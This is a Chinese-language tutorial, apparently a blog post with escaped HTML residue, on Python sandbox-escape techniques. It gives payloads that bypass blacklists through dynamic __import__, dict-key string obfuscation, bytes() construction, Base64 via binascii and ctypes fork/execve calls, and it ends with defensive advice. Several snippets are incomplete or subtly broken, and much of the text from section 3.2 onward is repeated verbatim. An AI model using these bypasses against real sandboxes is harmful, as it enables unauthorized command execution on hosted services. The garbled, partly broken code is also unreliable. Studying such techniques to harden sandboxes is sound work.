Python沙箱逃逸技术详解<\/h1>

1. Python沙箱概述<\/h2>

Python沙箱是一种隔离执行环境，用于限制代码的权限，防止其访问敏感资源。沙箱通常通过以下方式实现限制：<\/p>

禁用危险模块（如os、subprocess）<\/li>
过滤关键字和特殊字符<\/li>

限制函数调用<\/li> <\/ul>

2. 沙箱逃逸核心思路<\/h2>

2.1 绕过模块禁用<\/h3>

动态导入<\/strong>：使用__import__()<\/code>函数动态加载被禁用的模块<\/li>

反射访问<\/strong>：通过getattr()<\/code>或vars()<\/code>访问模块属性和方法<\/li> <\/ul> 2.2 突破函数过滤<\/h3> 内置函数利用<\/strong>：使用eval()<\/code>、exec()<\/code>、compile()<\/code>等内置函数<\/li> 编码技术<\/strong>：通过Base64、十六进制等编码绕过关键字检测<\/li> 字符串拼接<\/strong>：分片构造敏感字符串<\/li> <\/ul> 2.3 内存操作<\/h3> ctypes模块<\/strong>：直接调用底层C函数<\/li> cffi模块<\/strong>：外部函数接口，类似ctypes<\/li> <\/ul> 3. bytes构造任意字符串技术<\/h2> 3.1 bytes基本用法<\/h3> bytes(iterable_of_ints) # 通过可迭代的整数序列构造字节序列<\/span> <\/span><\/span><\/code><\/pre> 每个整数代表一个字节值（0-255）<\/li> 示例：bytes([119, 104, 111, 97, 109, 105])<\/code> → b'whoami'<\/code><\/li> <\/ul> 3.2 字符与字节对应关系<\/h3> 字符<\/th> ASCII值<\/th> <\/tr> <\/thead> 'w'<\/td> 119<\/td> <\/tr> 'h'<\/td> 104<\/td> <\/tr> 'o'<\/td> 111<\/td> <\/tr> 'a'<\/td> 97<\/td> <\/tr> 'm'<\/td> 109<\/td> <\/tr> 'i'<\/td> 105<\/td> <\/tr> <\/tbody> <\/table> 3.3 动态构造技术<\/h3> 列表推导式<\/strong>：避免直接使用逗号和空格<\/li> <\/ul> bytes([j for<\/span> i in<\/span> range(len("whoami"<\/span>)) for<\/span> j in<\/span> range(256<\/span>) if<\/span> ...<\/span>]) <\/span><\/span><\/code><\/pre> 条件筛选<\/strong>：动态生成条件语句<\/li> <\/ul> "i==<\/span>{i}<\/span> and j=={ord(j)}"<\/span> # 用于筛选特定字节<\/span> <\/span><\/span><\/code><\/pre>4. 黑名单绕过技术<\/h2> 4.1 字符串混淆技术<\/h3> # 构造"__import__"<\/span> <\/span><\/span>dict(_1_1i1m1p1o1r1t1_1_=<\/span>1<\/span>).<\/span>keys()[0<\/span>][::2<\/span>] # 取偶数位字符<\/span> <\/span><\/span><\/code><\/pre>4.2 动态导入模块<\/h3> # 构造"binascii"<\/span> <\/span><\/span>list(dict(b_i_n_a_s_c_i_i_=<\/span>1<\/span>))[0<\/span>][::2<\/span>] <\/span><\/span> <\/span><\/span># 动态导入<\/span> <\/span><\/span>eval("__import__"<\/span>)("binascii"<\/span>) <\/span><\/span><\/code><\/pre>4.3 Base64解码执行<\/h3> # 获取a2b_base64函数<\/span> <\/span><\/span>list(dict(a_2_b1_1b_a_s_e_6_4=<\/span>1<\/span>))[0<\/span>][::2<\/span>] <\/span><\/span> <\/span><\/span># 解码并执行Base64编码的命令<\/span> <\/span><\/span>vars(binascii)["a2b_base64"<\/span>](encoded_cmd) <\/span><\/span><\/code><\/pre>5. ctypes底层调用<\/h2> 5.1 系统调用原理<\/h3> os.system("ls")<\/code>的底层实现：<\/p> fork()<\/code>：创建子进程<\/li> execve()<\/code>：在子进程中执行新程序<\/li> waitpid()<\/code>：父进程等待子进程结束<\/li> <\/ol> 5.2 ctypes示例代码<\/h3> import<\/span> ctypes <\/span><\/span> <\/span><\/span>libc =<\/span> ctypes.<\/span>CDLL(None<\/span>) <\/span><\/span>fork =<\/span> libc.<\/span>fork <\/span><\/span>execve =<\/span> libc.<\/span>execve <\/span><\/span> <\/span><\/span>pid =<\/span> fork() <\/span><\/span>if<\/span> pid ==<\/span> 0<\/span>: # 子进程<\/span> <\/span><\/span> execve("\/bin\/ls"<\/span>, ["ls"<\/span>, "-l"<\/span>], None<\/span>) <\/span><\/span>else<\/span>: # 父进程<\/span> <\/span><\/span> libc.<\/span>waitpid(pid, 0<\/span>) <\/span><\/span><\/code><\/pre>5.3 ctypes危险功能<\/h3> 直接调用系统函数（fork<\/code>, execve<\/code>, socket<\/code>等）<\/li> 绕过Python层面的所有限制<\/li> 访问任意系统资源<\/li> <\/ul> 6. 综合逃逸Payload示例<\/h2> 6.1 动态构造命令执行<\/h3> # 构造并执行"__import__('os').system('whoami')"<\/span> <\/span><\/span>exp =<\/span> "__import__('os').system('whoami')"<\/span> <\/span><\/span>bytes([j for<\/span> i in<\/span> range(len(exp)) for<\/span> j in<\/span> range(256<\/span>) if<\/span> ...<\/span>]).<\/span>decode() <\/span><\/span><\/code><\/pre>6.2 Base64编码命令执行<\/h3> # 通过binascii解码执行Base64编码的命令<\/span> <\/span><\/span>vars(__import__(""<\/span>.<\/span>join([c for<\/span> c in<\/span> "binascii"<\/span>])))["a2b_base64"<\/span>]("d2hvYW1p"<\/span>).<\/span>decode() <\/span><\/span><\/code><\/pre>7. 防御建议<\/h2> 禁用危险模块<\/strong>：必须禁用ctypes<\/code>、cffi<\/code>等<\/li> 严格过滤<\/strong>：过滤所有特殊字符和关键字<\/li> 使用安全沙箱<\/strong>：如PyPy沙箱、RestrictedPython<\/li> 最小权限原则<\/strong>：仅开放必要功能<\/li> <\/ol> 8. 总结<\/h2> Python沙箱逃逸的核心在于：<\/p> 绕过字符串限制（bytes构造、混淆）<\/li> 动态加载被禁模块（__import__<\/code>、反射）<\/li> 底层系统调用（ctypes）<\/li> 编码解码技术（Base64）<\/li> <\/ul> 理解这些技术有助于开发更安全的Python沙箱环境。<\/p>

字符<\/th>	ASCII值<\/th> <\/tr> <\/thead>
'w'<\/td>	119<\/td> <\/tr>
'h'<\/td>	104<\/td> <\/tr>
'o'<\/td>	111<\/td> <\/tr>
'a'<\/td>	97<\/td> <\/tr>
'm'<\/td>	109<\/td> <\/tr>
'i'<\/td>	105<\/td> <\/tr> <\/tbody> <\/table> 3.3 动态构造技术<\/h3> 列表推导式<\/strong>：避免直接使用逗号和空格<\/li> <\/ul> bytes([j for<\/span> i in<\/span> range(len("whoami"<\/span>)) for<\/span> j in<\/span> range(256<\/span>) if<\/span> ...<\/span>]) <\/span><\/span><\/code><\/pre> 条件筛选<\/strong>：动态生成条件语句<\/li> <\/ul> "i==<\/span>{i}<\/span> and j=={ord(j)}"<\/span> # 用于筛选特定字节<\/span> <\/span><\/span><\/code><\/pre>4. 黑名单绕过技术<\/h2> 4.1 字符串混淆技术<\/h3> # 构造"__import__"<\/span> <\/span><\/span>dict(_1_1i1m1p1o1r1t1_1_=<\/span>1<\/span>).<\/span>keys()[0<\/span>][::2<\/span>] # 取偶数位字符<\/span> <\/span><\/span><\/code><\/pre>4.2 动态导入模块<\/h3> # 构造"binascii"<\/span> <\/span><\/span>list(dict(b_i_n_a_s_c_i_i_=<\/span>1<\/span>))[0<\/span>][::2<\/span>] <\/span><\/span> <\/span><\/span># 动态导入<\/span> <\/span><\/span>eval("__import__"<\/span>)("binascii"<\/span>) <\/span><\/span><\/code><\/pre>4.3 Base64解码执行<\/h3> # 获取a2b_base64函数<\/span> <\/span><\/span>list(dict(a_2_b1_1b_a_s_e_6_4=<\/span>1<\/span>))[0<\/span>][::2<\/span>] <\/span><\/span> <\/span><\/span># 解码并执行Base64编码的命令<\/span> <\/span><\/span>vars(binascii)["a2b_base64"<\/span>](encoded_cmd) <\/span><\/span><\/code><\/pre>5. ctypes底层调用<\/h2> 5.1 系统调用原理<\/h3> os.system("ls")<\/code>的底层实现：<\/p> fork()<\/code>：创建子进程<\/li> execve()<\/code>：在子进程中执行新程序<\/li> waitpid()<\/code>：父进程等待子进程结束<\/li> <\/ol> 5.2 ctypes示例代码<\/h3> import<\/span> ctypes <\/span><\/span> <\/span><\/span>libc =<\/span> ctypes.<\/span>CDLL(None<\/span>) <\/span><\/span>fork =<\/span> libc.<\/span>fork <\/span><\/span>execve =<\/span> libc.<\/span>execve <\/span><\/span> <\/span><\/span>pid =<\/span> fork() <\/span><\/span>if<\/span> pid ==<\/span> 0<\/span>: # 子进程<\/span> <\/span><\/span> execve("\/bin\/ls"<\/span>, ["ls"<\/span>, "-l"<\/span>], None<\/span>) <\/span><\/span>else<\/span>: # 父进程<\/span> <\/span><\/span> libc.<\/span>waitpid(pid, 0<\/span>) <\/span><\/span><\/code><\/pre>5.3 ctypes危险功能<\/h3> 直接调用系统函数（fork<\/code>, execve<\/code>, socket<\/code>等）<\/li> 绕过Python层面的所有限制<\/li> 访问任意系统资源<\/li> <\/ul> 6. 综合逃逸Payload示例<\/h2> 6.1 动态构造命令执行<\/h3> # 构造并执行"__import__('os').system('whoami')"<\/span> <\/span><\/span>exp =<\/span> "__import__('os').system('whoami')"<\/span> <\/span><\/span>bytes([j for<\/span> i in<\/span> range(len(exp)) for<\/span> j in<\/span> range(256<\/span>) if<\/span> ...<\/span>]).<\/span>decode() <\/span><\/span><\/code><\/pre>6.2 Base64编码命令执行<\/h3> # 通过binascii解码执行Base64编码的命令<\/span> <\/span><\/span>vars(__import__(""<\/span>.<\/span>join([c for<\/span> c in<\/span> "binascii"<\/span>])))["a2b_base64"<\/span>]("d2hvYW1p"<\/span>).<\/span>decode() <\/span><\/span><\/code><\/pre>7. 防御建议<\/h2> 禁用危险模块<\/strong>：必须禁用ctypes<\/code>、cffi<\/code>等<\/li> 严格过滤<\/strong>：过滤所有特殊字符和关键字<\/li> 使用安全沙箱<\/strong>：如PyPy沙箱、RestrictedPython<\/li> 最小权限原则<\/strong>：仅开放必要功能<\/li> <\/ol> 8. 总结<\/h2> Python沙箱逃逸的核心在于：<\/p> 绕过字符串限制（bytes构造、混淆）<\/li> 动态加载被禁模块（__import__<\/code>、反射）<\/li> 底层系统调用（ctypes）<\/li> 编码解码技术（Base64）<\/li> <\/ul> 理解这些技术有助于开发更安全的Python沙箱环境。<\/p>